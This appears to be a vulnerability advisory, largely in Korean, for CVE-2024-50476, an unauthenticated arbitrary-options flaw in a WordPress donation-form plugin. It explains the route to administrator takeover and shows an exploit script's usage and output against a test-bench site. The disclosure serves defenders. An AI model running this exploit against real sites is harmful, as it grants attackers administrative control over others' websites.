
GRÜN spendino Spendenformular <= 1.0.1 - 인증되지 않은 임의 옵션 업데이트
GRÜN spendino Spendenformular <= 1.0.1 - 인증되지 않은 임의 옵션 업데이트
WordPress용 GRÜN spendino Spendenformular – Mehr Spenden! Weniger Arbeit! 플러그인은 버전 1.0.1 포함 모든 이전 버전에서 누락된 권한 확인으로 인해 권한 상승으로 이어질 수 있는 데이터 무단 수정에 취약합니다. 이로 인해 인증되지 않은 공격자가 WordPress 사이트의 임의 옵션을 업데이트할 수 있습니다. 이를 악용하여 등록 기본 역할을 관리자로 업데이트하고 사용자 등록을 활성화하여 공격자가 취약한 사이트에 대한 관리자 사용자 액세스 권한을 얻을 수 있습니다.
Published: 2024-10-25 00:00:00
CVE: CVE-2024-50476
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 9.8
Slugs: spendino
$ python3 CVE-2024-50476.py -h
usage: CVE-2024-50476.py [-h] -u URL [-f FIX]
CVE-2024-50476 | GRÜN spendino Spendenformular <= 1.0.1 - Unauthenticated Arbitrary Options Update The GRÜN spendino Spendenformular – Mehr Spenden! Weniger Arbeit! plugin for WordPress is vulnerable to unauthorized modification of data that
can lead to privilege escalation due to a missing capability check in all versions up to, and including, 1.0.1. This makes it possible for unauthenticated attackers to update arbitrary options on the WordPress site. This can be leveraged to
update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.
options:
-h, --help show this help message and exit
-u URL, --url URL Website URL
-f FIX, --fix FIX Reset after Exploit
$ python3 CVE-2024-50476.py -u https://wpscan-vulnerability-test-bench.ddev.site
Vulnerability check: https://wpscan-vulnerability-test-bench.ddev.site
Option set successfully: https://wpscan-vulnerability-test-bench.ddev.site/wp-admin/admin-ajax.php
You can now register a user as an admin user. Remember to run --fix yes after you have registered to prevent others exploiting the site.
Option set successfully: https://wpscan-vulnerability-test-bench.ddev.site/wp-admin/admin-ajax.php
You can now register a user as an admin user. Remember to run --fix yes after you have registered to prevent others exploiting the site.